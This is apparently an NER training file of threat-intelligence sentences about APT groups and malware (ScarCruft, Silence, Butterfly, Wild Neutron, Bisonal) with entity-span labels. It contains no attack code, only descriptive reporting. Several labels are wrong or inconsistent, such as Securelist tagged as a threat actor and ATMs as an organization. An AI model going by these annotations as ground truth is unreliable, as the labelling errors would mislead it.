{"text": "Earlier this month , Securelist 's technology caught another zero-day Adobe Flash Player exploit deployed in targeted attacks .", "spans": {"ORGANIZATION: Securelist": [[21, 31]], "VULNERABILITY: zero-day Adobe Flash Player exploit": [[61, 96]]}, "info": {"id": "dnrti_train_002364", "source": "dnrti_train"}}
{"text": "Securelist believe the attacks are launched by an APT Group we track under the codename \" ScarCruft \" .", "spans": {"THREAT_ACTOR: Securelist": [[0, 10]], "THREAT_ACTOR: ScarCruft": [[90, 99]]}, "info": {"id": "dnrti_train_002365", "source": "dnrti_train"}}
{"text": "ScarCruft is a relatively new APT group ; victims have been observed in Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]]}, "info": {"id": "dnrti_train_002366", "source": "dnrti_train"}}
{"text": "ScarCruft has several ongoing operations , utilizing multiple exploits — two for Adobe Flash and one for Microsoft Internet Explorer .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]], "TOOL: Adobe Flash": [[81, 92]], "TOOL: Microsoft Internet Explorer": [[105, 132]]}, "info": {"id": "dnrti_train_002367", "source": "dnrti_train"}}
{"text": "Operation Daybreak appears to have been launched by ScarCruft in March 2016 and employs a previously unknown ( 0-day ) Adobe Flash Player exploit .", "spans": {"VULNERABILITY: 0-day": [[111, 116]], "VULNERABILITY: Adobe Flash Player exploit": [[119, 145]]}, "info": {"id": "dnrti_train_002369", "source": "dnrti_train"}}
{"text": "Adobe Flash Player exploit .", "spans": {"VULNERABILITY: Adobe Flash Player exploit": [[0, 26]]}, "info": {"id": "dnrti_train_002370", "source": "dnrti_train"}}
{"text": "It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April .", "spans": {"THREAT_ACTOR: ScarCruft": [[25, 34]], "VULNERABILITY: zero day exploit": [[52, 68]], "VULNERABILITY: CVE-2016-0147": [[71, 84]]}, "info": {"id": "dnrti_train_002371", "source": "dnrti_train"}}
{"text": "Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": {"VULNERABILITY: Flash Player exploit": [[35, 55]], "VULNERABILITY: CVE-2016-4117": [[58, 71]]}, "info": {"id": "dnrti_train_002372", "source": "dnrti_train"}}
{"text": "ScarCruft 's Operation Erebus leverages another Flash Player exploit ( CVE-2016-4117 ) through the use of watering hole attacks .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]], "VULNERABILITY: Flash Player exploit": [[48, 68]], "VULNERABILITY: CVE-2016-4117": [[71, 84]]}, "info": {"id": "dnrti_train_002373", "source": "dnrti_train"}}
{"text": "Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets .", "spans": {"THREAT_ACTOR: ScarCruft": [[49, 58]], "VULNERABILITY: zero-day exploits": [[92, 109]]}, "info": {"id": "dnrti_train_002374", "source": "dnrti_train"}}
{"text": "After publishing our initial series of blogposts back in 2016 , Kaspersky have continued to track the ScarCruft threat actor .", "spans": {"ORGANIZATION: Kaspersky": [[64, 73]], "THREAT_ACTOR: ScarCruft": [[102, 111]]}, "info": {"id": "dnrti_train_002375", "source": "dnrti_train"}}
{"text": "After publishing our initial series of blogposts back in 2016 , we have continued to track the ScarCruft threat actor .", "spans": {}, "info": {"id": "dnrti_train_002376", "source": "dnrti_train"}}
{"text": "ScarCruft is a Korean-speaking and allegedly state-sponsored threat actor that usually targets organizations and companies with links to the Korean peninsula .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]]}, "info": {"id": "dnrti_train_002377", "source": "dnrti_train"}}
{"text": "The ScarCruft group uses common malware delivery techniques such as spear phishing and Strategic Web Compromises ( SWC ) .", "spans": {"THREAT_ACTOR: ScarCruft group": [[4, 19]], "TOOL: SWC": [[115, 118]]}, "info": {"id": "dnrti_train_002378", "source": "dnrti_train"}}
{"text": "ScarCruft uses a multi-stage binary infection scheme .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]]}, "info": {"id": "dnrti_train_002380", "source": "dnrti_train"}}
{"text": "One of the most notable functions of the initial dropper is to bypass Windows UAC ( User Account Control ) in order to execute the next payload with higher privileges .", "spans": {"TOOL: dropper": [[49, 56]]}, "info": {"id": "dnrti_train_002381", "source": "dnrti_train"}}
{"text": "This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams .", "spans": {"VULNERABILITY: CVE-2018-8120": [[63, 76]], "TOOL: UACME": [[80, 85]]}, "info": {"id": "dnrti_train_002382", "source": "dnrti_train"}}
{"text": "Afterwards , the installer malware creates a downloader and a configuration file from its resource and executes it .", "spans": {}, "info": {"id": "dnrti_train_002383", "source": "dnrti_train"}}
{"text": "The downloader malware uses the configuration file and connects to the C2 server to fetch the next payload .", "spans": {"TOOL: downloader malware": [[4, 22]]}, "info": {"id": "dnrti_train_002384", "source": "dnrti_train"}}
{"text": "The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration .", "spans": {"THREAT_ACTOR: ScarCruft": [[4, 13]]}, "info": {"id": "dnrti_train_002385", "source": "dnrti_train"}}
{"text": "We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester .", "spans": {"TOOL: malware": [[48, 55]], "MALWARE: Bluetooth device harvester": [[89, 115]]}, "info": {"id": "dnrti_train_002386", "source": "dnrti_train"}}
{"text": "We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them .", "spans": {}, "info": {"id": "dnrti_train_002387", "source": "dnrti_train"}}
{"text": "ScarCruft also attacked a diplomatic agency in Hong Kong , and another diplomatic agency in North Korea .", "spans": {"ORGANIZATION: diplomatic agency": [[26, 43], [71, 88]]}, "info": {"id": "dnrti_train_002388", "source": "dnrti_train"}}
{"text": "It appears ScarCruft is primarily targeting intelligence for political and diplomatic purposes .", "spans": {"THREAT_ACTOR: ScarCruft": [[11, 20]]}, "info": {"id": "dnrti_train_002389", "source": "dnrti_train"}}
{"text": "ScarCruft infected this victim on September 21 , 2018 .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]]}, "info": {"id": "dnrti_train_002390", "source": "dnrti_train"}}
{"text": "But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26 , 2018 .", "spans": {"THREAT_ACTOR: ScarCruft": [[15, 24]]}, "info": {"id": "dnrti_train_002391", "source": "dnrti_train"}}
{"text": "ScarCruft has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]], "ORGANIZATION: business sector": [[79, 94]], "ORGANIZATION: diplomatic agencies": [[151, 170]]}, "info": {"id": "dnrti_train_002392", "source": "dnrti_train"}}
{"text": "Earlier this month , we caught another zero-day Adobe Flash Player exploit deployed in targeted attacks .", "spans": {"VULNERABILITY: zero-day Adobe Flash Player exploit": [[39, 74]]}, "info": {"id": "dnrti_train_002393", "source": "dnrti_train"}}
{"text": "ScarCruft is a relatively new APT group ; victims have been observed in several countries , including Russia , Nepal , South Korea , China , India , Kuwait and Romania .", "spans": {"THREAT_ACTOR: ScarCruft": [[0, 9]]}, "info": {"id": "dnrti_train_002394", "source": "dnrti_train"}}
{"text": "Currently , the group is engaged in two major operations : Operation Daybreak and Operation Erebus .", "spans": {}, "info": {"id": "dnrti_train_002395", "source": "dnrti_train"}}
{"text": "The other one , ScarCruft 's Operation Erebus employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": {"VULNERABILITY: CVE-2016-4117": [[77, 90]]}, "info": {"id": "dnrti_train_002396", "source": "dnrti_train"}}
{"text": "The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": {"VULNERABILITY: CVE-2016-4117": [[68, 81]]}, "info": {"id": "dnrti_train_002397", "source": "dnrti_train"}}
{"text": "We will publish more details about the attack once Adobe patches the vulnerability , which should be on June 16 .", "spans": {}, "info": {"id": "dnrti_train_002398", "source": "dnrti_train"}}
{"text": "The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily .", "spans": {"VULNERABILITY: Flash zero day": [[41, 55]]}, "info": {"id": "dnrti_train_002399", "source": "dnrti_train"}}
{"text": "Adobe on Thursday patched a zero-day vulnerability in Flash Player that has been used in targeted attacks carried out by a new APT group operating primarily against high-profile victims in Russia and Asia .", "spans": {"VULNERABILITY: zero-day vulnerability": [[28, 50]]}, "info": {"id": "dnrti_train_002400", "source": "dnrti_train"}}
{"text": "Researchers at Kaspersky Lab privately disclosed the flaw to Adobe after exploits against the zero-day were used in March by the ScarCruft APT gang in what Kaspersky Lab is calling Operation Daybreak .", "spans": {"ORGANIZATION: Kaspersky Lab": [[15, 28], [156, 169]], "VULNERABILITY: zero-day": [[94, 102]]}, "info": {"id": "dnrti_train_002401", "source": "dnrti_train"}}
{"text": "Kaspersky speculates that ScarCruft could also be behind another zero-day , CVE-2016-0147 , a vulnerability in Microsoft XML Core Services that was patched in April .", "spans": {"ORGANIZATION: Kaspersky": [[0, 9]], "THREAT_ACTOR: ScarCruft": [[26, 35]], "VULNERABILITY: zero-day": [[65, 73]], "VULNERABILITY: CVE-2016-0147": [[76, 89]]}, "info": {"id": "dnrti_train_002402", "source": "dnrti_train"}}
{"text": "Attacks start with spear-phishing emails that include a link to a website hosting an exploit kit associated with ScarCruft and used in other attacks .", "spans": {"THREAT_ACTOR: ScarCruft": [[113, 122]]}, "info": {"id": "dnrti_train_002403", "source": "dnrti_train"}}
{"text": "Another set of attacks called Operation Erebus leverages another Flash exploit , CVE-2016-4117 , and relies on watering hole attacks as a means of propagation .", "spans": {"VULNERABILITY: Flash exploit": [[65, 78]], "VULNERABILITY: CVE-2016-4117": [[81, 94]]}, "info": {"id": "dnrti_train_002404", "source": "dnrti_train"}}
{"text": "Thursday 's Flash Player update patched 36 vulnerabilities in total including the zero day CVE-2016-4171 .", "spans": {"VULNERABILITY: zero day": [[82, 90]], "VULNERABILITY: CVE-2016-4171": [[91, 104]]}, "info": {"id": "dnrti_train_002405", "source": "dnrti_train"}}
{"text": "The ongoing operation likely began as early as January 2017 and has continued through the first quarter of 2019 .", "spans": {}, "info": {"id": "dnrti_train_002406", "source": "dnrti_train"}}
{"text": "Cisco Talos assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 .", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]]}, "info": {"id": "dnrti_train_002407", "source": "dnrti_train"}}
{"text": "We assess with high confidence that these operations are distinctly different and independent from the operations performed by DNSpionage , which we reported on in November 2018 .", "spans": {}, "info": {"id": "dnrti_train_002408", "source": "dnrti_train"}}
{"text": "The common use of the Enfal Trojan suggests that Shadow Network may be exchanging tools and techniques .", "spans": {"TOOL: Enfal Trojan": [[22, 34]]}, "info": {"id": "dnrti_train_002409", "source": "dnrti_train"}}
{"text": "While Silence had previously targeted Russian banks , Group-IB experts also have discovered evidence of the group 's activity in more than 25 countries worldwide .", "spans": {"THREAT_ACTOR: While Silence": [[0, 13]], "ORGANIZATION: Group-IB": [[54, 62]]}, "info": {"id": "dnrti_train_002410", "source": "dnrti_train"}}
{"text": "In August 2017 , the National Bank of Ukraine warned state-owned and private banks across the country about a large-scale phishing attack .", "spans": {"ORGANIZATION: National Bank": [[21, 34]]}, "info": {"id": "dnrti_train_002411", "source": "dnrti_train"}}
{"text": "The threat actor used an exploit from the arsenal of the state-sponsored hacker group APT28 .", "spans": {"THREAT_ACTOR: APT28": [[86, 91]]}, "info": {"id": "dnrti_train_002412", "source": "dnrti_train"}}
{"text": "The new threat actor group was eventually named Silence .", "spans": {}, "info": {"id": "dnrti_train_002413", "source": "dnrti_train"}}
{"text": "Silence is a group of Russian-speaking hackers , based on their commands language , the location of infrastructure they used , and the geography of their targets ( Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan ) .", "spans": {}, "info": {"id": "dnrti_train_002414", "source": "dnrti_train"}}
{"text": "Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": {"ORGANIZATION: bank employees": [[54, 68]]}, "info": {"id": "dnrti_train_002415", "source": "dnrti_train"}}
{"text": "Silence also used Russian-language web hosting services .", "spans": {"TOOL: web hosting services": [[35, 55]]}, "info": {"id": "dnrti_train_002416", "source": "dnrti_train"}}
{"text": "Financially motivated APT groups which focus efforts on targeted attacks on the financial sector such as — Anunak , Corkow , Buhtrap — usually managed botnets using developed or modified banking Trojans .", "spans": {"ORGANIZATION: financial sector": [[80, 96]], "TOOL: Corkow": [[116, 122]]}, "info": {"id": "dnrti_train_002417", "source": "dnrti_train"}}
{"text": "They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": {"ORGANIZATION: Central Bank 's Automated Workstation Client": [[90, 134]], "ORGANIZATION: ATMs": [[139, 143]]}, "info": {"id": "dnrti_train_002418", "source": "dnrti_train"}}
{"text": "Group-IB researchers were tracking Silence throughout this period and conducting response following incidents in the financial sector .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "ORGANIZATION: financial sector": [[117, 133]]}, "info": {"id": "dnrti_train_002419", "source": "dnrti_train"}}
{"text": "Group-IB detected the first incidents relating to Silence in June 2016 .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]]}, "info": {"id": "dnrti_train_002420", "source": "dnrti_train"}}
{"text": "One of Silence 's first targets was a Russian bank , when they tried to attack AWS CBR .", "spans": {}, "info": {"id": "dnrti_train_002421", "source": "dnrti_train"}}
{"text": "They are selective in their attacks and wait for about three months between incidents , which is approximately three times longer than other financially motivated APT groups , like MoneyTaker , Anunak ( Carbanak ) , Buhtrap or Cobalt .", "spans": {}, "info": {"id": "dnrti_train_002422", "source": "dnrti_train"}}
{"text": "Silence try to apply new techniques and ways of stealing from various banking systems , including AWS CBR , ATMs , and card processing .", "spans": {}, "info": {"id": "dnrti_train_002423", "source": "dnrti_train"}}
{"text": "Silence 's successful attacks currently have been limited to the CIS and Eastern European countries .", "spans": {}, "info": {"id": "dnrti_train_002424", "source": "dnrti_train"}}
{"text": "He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software .", "spans": {}, "info": {"id": "dnrti_train_002425", "source": "dnrti_train"}}
{"text": "Silence 's main targets are located in Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan .", "spans": {}, "info": {"id": "dnrti_train_002426", "source": "dnrti_train"}}
{"text": "However , some phishing emails were sent to bank employees in more than 25 countries of Central and Western Europe , Africa and Asia including : Kyrgyzstan , Armenia , Georgia , Serbia , Germany , Latvia , Czech Republic , Romania , Kenya , Israel , Cyprus , Greece , Turkey , Taiwan , Malaysia , Switzerland , Vietnam , Austria , Uzbekistan , Great Britain , Hong Kong , and others .", "spans": {"ORGANIZATION: bank employees": [[44, 58]]}, "info": {"id": "dnrti_train_002427", "source": "dnrti_train"}}
{"text": "In the same year , they conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans .", "spans": {"TOOL: Perl IRC bot": [[57, 69]], "TOOL: public IRC chats": [[74, 90]]}, "info": {"id": "dnrti_train_002428", "source": "dnrti_train"}}
{"text": "In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans .", "spans": {"TOOL: Perl IRC bot": [[60, 72]], "TOOL: public IRC chats": [[77, 93]]}, "info": {"id": "dnrti_train_002429", "source": "dnrti_train"}}
{"text": "In two months , the group returned to their proven method and withdrew funds again through ATMs .", "spans": {}, "info": {"id": "dnrti_train_002430", "source": "dnrti_train"}}
{"text": "In September 2017 , we discovered a new targeted attack on financial institutions .", "spans": {"ORGANIZATION: financial institutions": [[59, 81]]}, "info": {"id": "dnrti_train_002431", "source": "dnrti_train"}}
{"text": "In September 2017 , we discovered Silence attack on financial institutions .", "spans": {"ORGANIZATION: financial institutions": [[52, 74]]}, "info": {"id": "dnrti_train_002432", "source": "dnrti_train"}}
{"text": "The infection vector is a spear-phishing email with a malicious attachment .", "spans": {}, "info": {"id": "dnrti_train_002433", "source": "dnrti_train"}}
{"text": "An interesting point in the Silence attack is that the cybercriminals had already compromised banking infrastructure in order to send their spear-phishing emails from the addresses of real bank employees and look as unsuspicious as possible to future victims .", "spans": {"ORGANIZATION: bank employees": [[189, 203]]}, "info": {"id": "dnrti_train_002434", "source": "dnrti_train"}}
{"text": "The spear-phishing infection vector is still the most popular way to initiate targeted campaigns .", "spans": {}, "info": {"id": "dnrti_train_002435", "source": "dnrti_train"}}
{"text": "We conclude that the actor behind the attack is Silence group , a relatively new threat actor that's been operating since mid-2016 .", "spans": {}, "info": {"id": "dnrti_train_002436", "source": "dnrti_train"}}
{"text": "A preliminary analysis caught the attention of our Threat Analysis and Intelligence team as it yielded interesting data that , among other things , shows that Silence was targeting employees from financial entities , specifically in the Russian Federation and the Republic of Belarus .", "spans": {"ORGANIZATION: employees": [[181, 190]], "ORGANIZATION: financial entities": [[196, 214]]}, "info": {"id": "dnrti_train_002437", "source": "dnrti_train"}}
{"text": "As shown above , the threat runs several native binaries to collect useful information for its recon phase .", "spans": {"TOOL: native binaries": [[41, 56]]}, "info": {"id": "dnrti_train_002438", "source": "dnrti_train"}}
{"text": "The intelligence we have collected shows that Silence is part of a more extensive operation , still focused on financial institutions operating mainly on Russian territory .", "spans": {"ORGANIZATION: financial institutions": [[111, 133]]}, "info": {"id": "dnrti_train_002439", "source": "dnrti_train"}}
{"text": "These spearphishing attempts represent an evolution of Iranian actors based on their social engineering tactics and narrow targeting .", "spans": {}, "info": {"id": "dnrti_train_002440", "source": "dnrti_train"}}
{"text": "Based on file modification dates and timestamps of samples , it appears that the observed campaign was initiated in the middle of February 2016 , with the infrastructure taken offline at the start of March .", "spans": {}, "info": {"id": "dnrti_train_002441", "source": "dnrti_train"}}
{"text": "While the Sima moniker could similarly originate from software labels , it is a common female Persian name and a Persian-language word for \" visage \" or \" appearance \" .", "spans": {}, "info": {"id": "dnrti_train_002442", "source": "dnrti_train"}}
{"text": "Given its use in more advanced social engineering campaigns against women 's rights activists , the label seem particularly apt .", "spans": {"ORGANIZATION: social engineering campaigns": [[31, 59]], "ORGANIZATION: women 's rights activists": [[68, 93]]}, "info": {"id": "dnrti_train_002443", "source": "dnrti_train"}}
{"text": "Samples and resource names contained the family names of prominent Iranians , and several of these individuals received the malware located in their respective folder .", "spans": {"ORGANIZATION: Iranians": [[67, 75]]}, "info": {"id": "dnrti_train_002444", "source": "dnrti_train"}}
{"text": "The Sima group also engaged in impersonation of Citizenship and Immigration Services at the Department of Homeland Security , posing as a notice about the expiration of the recipient 's Permanent Residence status .", "spans": {"THREAT_ACTOR: Sima": [[4, 8]], "ORGANIZATION: Department of Homeland Security": [[92, 123]]}, "info": {"id": "dnrti_train_002445", "source": "dnrti_train"}}
{"text": "In another case , Sima mirrored an announcement made about the broadcast of a television program on Iranian-American cultural affairs in order to impersonate the individual and engage in spearphishing within hours of the legitimate message .", "spans": {"THREAT_ACTOR: Sima": [[18, 22]]}, "info": {"id": "dnrti_train_002446", "source": "dnrti_train"}}
{"text": "The server used to host these malware samples was located on the German provider Hetzner ( 148.251.55.114 ) , within a small block of IP addresses that are registered with the customer ID \" HOS-156205 \" .", "spans": {"ORGANIZATION: provider": [[72, 80]]}, "info": {"id": "dnrti_train_002447", "source": "dnrti_train"}}
{"text": "All the samples appear to be have been compiled between February 29 and March 1 2016 , shortly before our discovery , suggesting that , despite the known C&C servers having quickly gone offline shortly after , this spree of attacks might be fresh and currently undergoing .", "spans": {}, "info": {"id": "dnrti_train_002448", "source": "dnrti_train"}}
{"text": "These archives provide further indication that those entities behind the campaigns are Persian-language speakers , due to the naming of files and folders in Persian .", "spans": {}, "info": {"id": "dnrti_train_002449", "source": "dnrti_train"}}
{"text": "For the sake of narrative we are going to focus exclusively to those samples we identified being used in attacks against Iranian civil society and diaspora .", "spans": {"ORGANIZATION: diaspora": [[147, 155]]}, "info": {"id": "dnrti_train_002450", "source": "dnrti_train"}}
{"text": "Butterfly has attacked multi-billion dollar companies operating in the internet , IT software , pharmaceutical , and commodities sectors .", "spans": {"THREAT_ACTOR: Butterfly": [[0, 9]], "ORGANIZATION: multi-billion dollar companies": [[23, 53]], "ORGANIZATION: commodities sectors": [[117, 136]]}, "info": {"id": "dnrti_train_002451", "source": "dnrti_train"}}
{"text": "The first signs of Butterfly 's activities emerged in early 2013 when several major technology and internet firms were compromised .", "spans": {"ORGANIZATION: internet firms": [[99, 113]]}, "info": {"id": "dnrti_train_002452", "source": "dnrti_train"}}
{"text": "However , an investigation by Symantec has found that the group has been active since at least March 2012 and its attacks have not only continued to the present day , but have also increased in number .", "spans": {"ORGANIZATION: Symantec": [[30, 38]]}, "info": {"id": "dnrti_train_002453", "source": "dnrti_train"}}
{"text": "Symantec has to date discovered 49 different organizations in more than 20 countries that have been attacked by Butterfly .", "spans": {"ORGANIZATION: Symantec": [[0, 8]]}, "info": {"id": "dnrti_train_002454", "source": "dnrti_train"}}
{"text": "Aside from the four companies which have publicly acknowledged attacks , Symantec has identified five other large technology firms compromised by Butterfly , primarily headquartered in the US .", "spans": {"ORGANIZATION: Symantec": [[73, 81]], "ORGANIZATION: technology firms": [[114, 130]]}, "info": {"id": "dnrti_train_002455", "source": "dnrti_train"}}
{"text": "In the first attack , Butterfly gained a foothold by first attacking a small European office belonging to one firm and using this infection to then move on to its US office and European headquarters .", "spans": {}, "info": {"id": "dnrti_train_002456", "source": "dnrti_train"}}
{"text": "However , technology is not the only sector the group has focused on and Symantec has found evidence that Butterfly has attacked three major European pharmaceutical firms .", "spans": {"ORGANIZATION: Symantec": [[73, 81]], "ORGANIZATION: pharmaceutical firms": [[150, 170]]}, "info": {"id": "dnrti_train_002457", "source": "dnrti_train"}}
{"text": "Butterfly has also shown an interest in the commodities sector , attacking two major companies involved in gold and oil in late 2014 .", "spans": {"THREAT_ACTOR: Butterfly": [[0, 9]], "ORGANIZATION: commodities sector": [[44, 62]]}, "info": {"id": "dnrti_train_002458", "source": "dnrti_train"}}
{"text": "The company specializes in finance and natural resources specific to that region .", "spans": {}, "info": {"id": "dnrti_train_002459", "source": "dnrti_train"}}
{"text": "The latter was one of at least three law firms Butterfly has targeted over the past three years .", "spans": {"ORGANIZATION: law firms": [[37, 46]], "THREAT_ACTOR: Butterfly": [[47, 56]]}, "info": {"id": "dnrti_train_002460", "source": "dnrti_train"}}
{"text": "In many attacks , the group has succeeded in compromising Microsoft Exchange or Lotus Domino email servers in order to intercept company emails and possibly use them to send counterfeit emails .", "spans": {"TOOL: Microsoft Exchange": [[58, 76]], "TOOL: Lotus Domino email servers": [[80, 106]]}, "info": {"id": "dnrti_train_002461", "source": "dnrti_train"}}
{"text": "A powerful threat actor known as \" Wild Neutron \" ( also known as \" Jripbot \" and \" Morpho \" ) has been active since at least 2011 , infecting high profile companies for several years by using a combination of exploits , watering holes and multi-platform malware .", "spans": {"THREAT_ACTOR: Jripbot": [[68, 75]], "THREAT_ACTOR: Morpho": [[84, 90]], "ORGANIZATION: high profile companies": [[143, 165]]}, "info": {"id": "dnrti_train_002462", "source": "dnrti_train"}}
{"text": "Based on the profile of the victims and the type of information targeted by the attackers , Symantec believes that Butterfly is financially motivated , stealing information it can potentially profit from .", "spans": {"ORGANIZATION: Symantec": [[92, 100]]}, "info": {"id": "dnrti_train_002463", "source": "dnrti_train"}}
{"text": "Wild Neutron hit the spotlight in 2013 , when it successfully infected companies such as Apple , Facebook , Twitter and Microsoft .", "spans": {"ORGANIZATION: Apple": [[89, 94]], "ORGANIZATION: Facebook": [[97, 105]], "ORGANIZATION: Twitter": [[108, 115]], "ORGANIZATION: Microsoft": [[120, 129]]}, "info": {"id": "dnrti_train_002464", "source": "dnrti_train"}}
{"text": "Wild Neutron 's attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit .", "spans": {"THREAT_ACTOR: Wild Neutron": [[0, 12]], "TOOL: stolen code signing certificate": [[39, 70]], "VULNERABILITY: Flash Player exploit": [[132, 152]]}, "info": {"id": "dnrti_train_002465", "source": "dnrti_train"}}
{"text": "During the 2013 attacks , the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk.com , which is an iPhone developers forum .", "spans": {}, "info": {"id": "dnrti_train_002466", "source": "dnrti_train"}}
{"text": "Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes .", "spans": {"THREAT_ACTOR: Wild Neutron": [[0, 12]], "VULNERABILITY: Java zero-day exploit": [[43, 64]]}, "info": {"id": "dnrti_train_002467", "source": "dnrti_train"}}
{"text": "While the group used watering hole attacks in 2013 , it's still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks .", "spans": {}, "info": {"id": "dnrti_train_002468", "source": "dnrti_train"}}
{"text": "Wild Neutron 's tools include a password harvesting trojan , a reverse-shell backdoor and customized implementations of OpenSSH , WMIC and SMB .", "spans": {"THREAT_ACTOR: Wild Neutron": [[0, 12]], "TOOL: password harvesting trojan": [[32, 58]], "TOOL: reverse-shell backdoor": [[63, 85]], "TOOL: customized implementations of OpenSSH": [[90, 127]], "TOOL: WMIC": [[130, 134]], "TOOL: SMB": [[139, 142]]}, "info": {"id": "dnrti_train_002469", "source": "dnrti_train"}}
{"text": "Instead of Flash exploits , older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013 , detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b .", "spans": {"VULNERABILITY: Flash exploits": [[11, 25]], "VULNERABILITY: Java zero-day": [[95, 108]], "ORGANIZATION: Kaspersky Lab": [[168, 181]], "VULNERABILITY: Exploit.Java.CVE-2012-3213.b": [[194, 222]]}, "info": {"id": "dnrti_train_002470", "source": "dnrti_train"}}
{"text": "The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases , a small number of computers have been infected throughout Wild Neutron .", "spans": {"ORGANIZATION: IT": [[53, 55]], "ORGANIZATION: real estate/investment companies": [[60, 92]], "THREAT_ACTOR: Wild Neutron": [[171, 183]]}, "info": {"id": "dnrti_train_002471", "source": "dnrti_train"}}
{"text": "Wild Neutron 's targeting of major IT companies , spyware developers ( FlexiSPY ) , jihadist forums ( the \" Ansar Al-Mujahideen English Forum \" ) and Bitcoin companies indicate a flexible yet unusual mindset and interests .", "spans": {"THREAT_ACTOR: Wild Neutron": [[0, 12]], "ORGANIZATION: IT companies": [[35, 47]], "ORGANIZATION: spyware developers": [[50, 68]], "ORGANIZATION: FlexiSPY": [[71, 79]], "ORGANIZATION: jihadist forums": [[84, 99]], "ORGANIZATION: Ansar Al-Mujahideen English Forum": [[108, 141]], "ORGANIZATION: Bitcoin companies": [[150, 167]]}, "info": {"id": "dnrti_train_002472", "source": "dnrti_train"}}
{"text": "We continue to track the Wild Neutron group , which is still active as of June 2015 .", "spans": {"THREAT_ACTOR: Wild Neutron group": [[25, 43]]}, "info": {"id": "dnrti_train_002473", "source": "dnrti_train"}}
{"text": "A ransomware variant dubbed PyLocky was observed in September 2018 being distributed by a phishing campaign using an invoicing theme .", "spans": {"TOOL: PyLocky": [[28, 35]]}, "info": {"id": "dnrti_train_002474", "source": "dnrti_train"}}
{"text": "PyLocky was found to be targeting entities in France and Germany .", "spans": {"TOOL: PyLocky": [[0, 7]]}, "info": {"id": "dnrti_train_002475", "source": "dnrti_train"}}
{"text": "Fxmsp specialize in breaching highly secure protected networks to access private corporate and government information .", "spans": {"THREAT_ACTOR: Fxmsp": [[0, 5]]}, "info": {"id": "dnrti_train_002476", "source": "dnrti_train"}}
{"text": "Fxmsp is a hacking collective that has operated in various top-tier Russian- and English-speaking underground communities since 2017 .", "spans": {"THREAT_ACTOR: Fxmsp": [[0, 5]]}, "info": {"id": "dnrti_train_002477", "source": "dnrti_train"}}
{"text": "Throughout 2017 and 2018 , Fxmsp established a network of trusted proxy resellers to promote their breaches on the criminal underground .", "spans": {"THREAT_ACTOR: Fxmsp": [[27, 32]]}, "info": {"id": "dnrti_train_002478", "source": "dnrti_train"}}
{"text": "On April 24 , 2019 , Fxmsp claimed to have secured access to three leading antivirus companies .", "spans": {"THREAT_ACTOR: Fxmsp": [[21, 26]], "ORGANIZATION: antivirus companies": [[75, 94]]}, "info": {"id": "dnrti_train_002479", "source": "dnrti_train"}}
{"text": "According to the Fxmsp , they worked tirelessly for the first quarter of 2019 to breach these companies and finally succeeded and obtained access to the companies' internal networks .", "spans": {}, "info": {"id": "dnrti_train_002480", "source": "dnrti_train"}}
{"text": "Booz Allen Hamilton in 2014 and AhnLab in 2015 reported on Bisonal using a simple XOR cipher to hide the C2 address strings in the body . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP port 443 .", "spans": {"ORGANIZATION: Booz Allen Hamilton": [[0, 19]], "ORGANIZATION: AhnLab": [[32, 38]], "THREAT_ACTOR: Bisonal malware": [[152, 167]], "MALWARE: Bisonal": [[236, 243]]}, "info": {"id": "dnrti_train_002481", "source": "dnrti_train"}}
{"text": "Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia .", "spans": {"MALWARE: Bisonal malware": [[32, 47]]}, "info": {"id": "dnrti_train_002482", "source": "dnrti_train"}}
{"text": "This particular sample we found targeted an organization in Russia and there is a specific system language check for Cyrillic and no others .", "spans": {"MALWARE: sample": [[16, 22]]}, "info": {"id": "dnrti_train_002483", "source": "dnrti_train"}}
